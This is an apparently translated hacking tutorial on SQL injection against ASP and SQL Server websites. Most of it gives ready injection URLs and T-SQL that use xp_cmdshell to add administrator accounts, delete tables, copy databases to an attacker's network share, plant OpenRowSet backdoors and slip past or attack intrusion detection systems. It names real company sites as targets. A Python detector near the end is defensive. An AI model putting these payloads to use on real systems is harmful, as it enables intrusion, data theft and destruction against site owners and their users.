Many news, BBS and e-commerce websites, at home and abroad, are built on ASP + SQL Server, and much of the ASP is written by inexperienced programmers (many just graduated). As a result, attacks against ASP + SQL have a relatively high success rate. This kind of attack has little to do with the NT version or the SQL Server version, and there is no patch for it, because the vulnerability is introduced by the programmer himself; most books that teach ASP programming even ship this vulnerability in their sample source code. In fact, nothing more than some legitimate-looking ASP requests to SQL leave endless trouble behind!
This attack method originated from the ' or '1'='1 vulnerability (which we will call a vulnerability for the time being). I think you already know its principle: exec sp_addlogin Hax (adds a Hax login to the database). But this method has two big limitations. First, the SQL Server account used by the ASP page must be an administrator; second, the submitted variable must sit at the very end of the whole SQL statement, because some programmers write select * from news where id=... and topic=... and ...
If that kind of query is used, then requesting news.asp?id=2;exec sp_addlogin Hax turns the statement into select * from news where id=2;exec sp_addlogin Hax and topic=... and ... After the stored procedure sp_addlogin, the statement still carries an and condition, so the syntax is invalid and sp_addlogin does not run either.
Method:
news.asp?id=2;exec sp_addlogin Hax;--
The trailing -- turns the condition that follows sp_addlogin into a comment, so there is no syntax error and sp_addlogin executes normally!
Now put them together:
news.asp?id=2;exec master.dbo.sp_addlogin Hax;--
news.asp?id=2;exec master.dbo.sp_password null,Hax,Hax;--
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin Hax;--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user Hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators Hax /add';--
In this way you have left a Hax administrator account in both the database and the operating system. Of course, the prerequisite is that the ASP page connects with the SQL administrator account, so stop trying this on shared virtual hosting, where this vulnerability does not exist. Later we will discuss how to intrude into ASP when the other side does not use the SQL administrator account; port 1433 will also come into it. You can also try adding a ' after id=2, mainly to see how the other side's ASP is written.
What should we do when the SQL account used by the ASP program is not the administrator? For example, the homepage of Tian Rongxin has the following news page:
http://www.talentit.com.cn/news/news-2.asp?newid=117
Try http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;-- and a syntax error is reported: the select 123 fails, so evidently Tian Rongxin's ASP appends a ' after the newid variable. Then try http://www.talentit.com.cn/news/news-2.asp?newid=100';delete news;-- and I think the news table will be deleted, as long as the table name is right.
Even when the SQL account used by ASP is not the administrator, it is usually the owner of a database, and at least has high management permissions within that database.
But how do we learn the database name? Look at the db_name() function: open Query Analyzer and try print db_name().
Likewise, declare @a sysname; set @a=db_name(); backup database @a to disk='\\<your IP>\<your share>\bak.dat', name='test';-- and his current database is backed up to your hard disk. You will understand what to do next. The same method can also find the IP address of the other side's SQL Server: first install a firewall and enable alerts for ICMP, 139/tcp and 445/tcp, then try news.asp?id=2;exec master.dbo.xp_cmdshell 'ping <your IP>'. If the firewall reports that someone is pinging you, it is certain that the other side's ASP runs with SQL administrator privilege, and at the same time you have the exact location of their SQL Server. Many large websites separate the web server from the database for performance, and when you cannot see the source code, I think this is the only way to locate the other side's SQL Server quickly.
So if the ASP page does not have SQL administrator permission, we cannot call xp_cmdshell. What then?
Don't worry, try news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk='\\<your IP>\<your share>\bak.dat',name='test';-- Your firewall should have issued a warning that someone connected to your port 445 or 139 (the Win9x port), and the IP address of the other side's SQL Server is exposed as well.
And what if the other side's connection is not even the owner of a database? Next time I will tell you a better way.
In fact, backing the database up to your own hard disk is a bit of an exaggeration; if the other side's database is very large, you will have to dial up to the Internet all over again. Next time we will talk about how to cheat IDS during ASP + SQL infiltration.
Some good IDS have already begun to monitor for the xp_cmdshell keyword. Okay, see you next time!
All the URLs above should be submitted through VBScript, because the browser's address bar mangles some special characters and your command will not be transmitted intact: window.location.href = URL
Supplement: this problem has been raised on the Internet before, but only as a few simple xp_cmdshell calls with many restrictions. In fact there are still many places worth exploring. For example, Guosen Securities (www.guosen.com.cn) has this problem. They use Microsoft's three-tier architecture, so with the xp_cmdshell method mentioned earlier the string gets filtered, but I tried it, and through heterogeneous SQL requests you can still enable the telnet service and an Administrators-group account on the other side's machine! Because their firewall is very strict, it is hard to obtain their database structure; only port 80 is open for data in and out of the checkpoint, but there is still a way :P
By the way, a reminder: sqloledb, db_name, OpenRowSet and OpenDataSource are very useful when the SQL Server account used by ASP is just an ordinary user!
New SQL Server Vulnerabilities and some breakthroughs
Now I want to talk about some new SQL Server bugs. Although I worked hard for a long time to find them, I was also lucky, and I would hate to keep them to myself, so I would like to ask you to verify them. Of course some experts may already know them; after all, I have been working with SQL Server for less than a year :P
1. About OpenRowSet and OpenDataSource
Maybe someone already knows this trick: using OpenRowSet to execute local commands.
Generally the usage (including in the MSDN columns) is as follows:
select * from OpenRowSet('sqloledb','myserver';'sa';'','select * from table')
As you can see (even from the name), OpenRowSet is just a shortcut for remote database access. It must be followed by a select, that is, a recordset must be returned.
So can we use it to call xp_cmdshell? The answer is yes!
select * from OpenRowSet('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''')
set fmtonly off must be added, because by default only column information is returned. With it, the result set returned by xp_cmdshell is handed to the outer select. With the default setting an empty set comes back, the select fails, and the command is not executed.
If we want to call sp_addlogin, which unlike xp_cmdshell returns no result set at all, we can no longer rely on the fmtonly setting. Instead we can do this: select * from OpenRowSet('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hectic'). This way the command returns at least the result of select 'OK!', your machine displays OK!, and at the same time the other database gains a hectic login. In other words, we use the set returned by select 'OK!' to spoof the local select request, and the command executes normally. The same works with sp_addsrvrolemember and with OpenDataSource!
As for the real use of this method, it is easy to think of :P
2. Two msdasql requests
I wonder if you have tried connecting to a remote database with msdasql. Of course, this API must be called by the SQL Server administrator.
select * from OpenRowSet('msdasql','driver=;server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from table2') When table1 and table2 have different numbers of columns, you will find that the other side's SQL Server crashes: local connections fail while system resource usage looks completely normal. After killing the sqlserver process with pskill, unless the machine is rebooted, SQL Server either fails to start normally or keeps running into illegal operations. I found this bug by accident and have not understood the specific cause. Strangely, it only happens with msdasql, and sqloledb does not have this problem, so it seems the issue is not a mismatch between the number of requested and returned result sets but msdasql itself. As for the specific reason, let's take a closer look :P
3. A Terrible Backdoor
It used to be said on the Internet that a backdoor could be left in SQL Server by adding triggers or jobs, or by rewriting sp_addlogin and sp_addsrvrolemember. These methods work, but they are easy to discover. I wonder if you have thought about sqloledb's local connection mapping. For example, with the SQL Server administrator account execute select * from OpenRowSet('sqloledb','trusted_connection=yes;data source=hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\'''). This creates a local connection mapping named hectic on the other side's server. As long as SQL Server does not restart, the mapping remains, and at least I do not yet know how to find a connection mapping left behind by someone else. After running the command above, you will find that even a SQL Server guest user with no permissions at all can run the same command, and with LocalSystem permission (default installation)! Haha! This method can be used to leave a backdoor on a SQL Server that has already been intruded into and where administrator permission has been obtained.
The above method was tested on SQL Server 2000 and SQL Server 2000 SP1!
* Another guess: have you noticed the two DSNs that Windows ships with by default? One is localserver and the other is msqi. Both are created so that the local administrator account connects to SQL Server. If the other side's SQL Server is started under a custom power user account, then SA's permission is the same as that power user's and it is hard to do much. However, with the following command, select * from OpenRowSet('msdasql','dsn=localserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\'''), we should be able to connect to the local SQL Server with the administrator account behind localserver and execute local commands with that account's permission, and after that I think SA's power-user restriction could be broken. The problem is that sqloledb cannot use a DSN connection, and msdasql cannot be called by anyone but the administrator. So I am looking for a way for guest to call msdasql. If someone knows how to get around this, or has a new idea, we can discuss it together. If this could be exploited by guest, it would be a very serious security vulnerability.
Because any of the SQL statements mentioned above can be submitted to the other side's ASP for it to execute on our behalf :P
Using T-SQL to cheat IDS or attack IDS
IDS has become increasingly intelligent.
Some IDS have added monitoring for xp_cmdshell and sp_addlogin, but artificial intelligence has not arrived yet, and such monitoring is always a lie. Let's talk about spoofing IDS first:
IDS monitors the xp_cmdshell keyword, so we can do this: declare @a sysname set @a="xp_"+"cmdshell" exec @a 'dir c:\' Everyone can understand this code. Also, xp_cmdshell, being a stored procedure, has a fixed ID number in the master database, so we can also do this.
Assume that this ID is 988456:
declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'
Or of course:
declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'
In this way, IDS cannot monitor completely.
Similarly, sp_addlogin can be handled the same way.
Let's talk about attacking IDS:
Because IDS produces a large amount of data, it is usually archived day by day into a conventional database such as SQL Server.
Using the old recordset.AddNew method would seriously hurt IDS performance, whereas T-SQL requests through ADO are not only efficient but also let some of the work be handed over to SQL Server.
Normally the program writes: insert table values('log content',...)
So let me think: if the captured content is temp') exec xp_cmdshell 'dir c:\' --, then after it is submitted the statement becomes
insert table values('log content'....'temp') exec xp_cmdshell 'dir c:\' --'). In this way xp_cmdshell runs inside the IDS database. Of course, IDS is a sniffer and captures every packet, and the browser turns spaces into %20 when submitting, so %20 is what reaches SQL Server and your command will not execute. The only way is insert/**/table/**/values('log content'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/--')
Use /**/ instead of a space as the delimiter so that your T-SQL executes in the IDS database. Of course, other statements can be used to destroy the IDS database or back it up to your shared directory. Haha...
In fact, the principle of this method is the same as attacking ASP, except that spaces become /**/. The ASP case is a select statement, so a ' suffices; the IDS case is an insert statement, so ') is used instead.
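Every trick in the two passages above (string concatenation "xp_"+"cmdshell", resolving the procedure name from sysobjects and running it via exec @a, /**/ in place of spaces, %20 encoding) defeats a detector that matches raw keywords only; the detector has to normalize the request before matching. The following is an added example, my code and not from the article, showing such a normalization step in Python over constructed sample requests; the function names and the sample strings are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample requests modelled on the evasion tricks described in the article
# (made up for this example, not captured from any real system).
SAMPLES = {
    "plain":    "id=2;exec master.dbo.xp_cmdshell 'dir c:\\';--",
    "concat":   "id=2;declare @a sysname set @a=\"xp_\"+\"cmdshell\" exec @a 'dir c:\\'",
    "sysobj":   "id=2;declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\\'",
    "comments": "temp')/**/exec/**/xp_cmdshell/**/'dir%20c:\\'/**/--",
    "benign":   "newid=117",
}

# Keywords the article says a naive IDS looks for, plus the remote-query helpers it abuses.
DANGEROUS = ("xp_cmdshell", "sp_addlogin", "sp_addsrvrolemember",
             "openrowset", "opendatasource", "backup database")

# Two adjacent string literals joined by +, e.g. "xp_"+"cmdshell"
CONCAT = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")

def normalize(raw):
    """Undo the transformations used to hide keywords from keyword matching."""
    s = unquote(raw)                                 # %20 -> space (unquote keeps '+' intact)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)     # /**/ used in place of whitespace
    while True:                                      # fold "xp_"+"cmd"+"shell" one join per pass
        folded = CONCAT.sub(r"\g<1>\g<2>\g<4>\g<1>", s)
        if folded == s:
            break
        s = folded
    return re.sub(r"\s+", " ", s).lower()

def findings(raw):
    """Return the list of indicators found in one request after normalization."""
    s = normalize(raw)
    hits = [k for k in DANGEROUS if k in s]
    if re.search(r"\bexec(ute)?\s+@\w+", s):         # exec @a: procedure name resolved at run time
        hits.append("exec-of-variable")
    if re.search(r"\bfrom\s+sysobjects\b", s):       # procedure name looked up by object id
        hits.append("sysobjects-name-lookup")
    return hits

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:9} -> {findings(raw) or 'clean'}")
```

The "sysobj" sample never contains the literal xp_cmdshell, which is exactly why the detector also flags exec of a variable and name lookups in sysobjects rather than relying on the keyword alone.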
Well, you can think of many other new intrusion statements. The best test tool is Query Analyzer.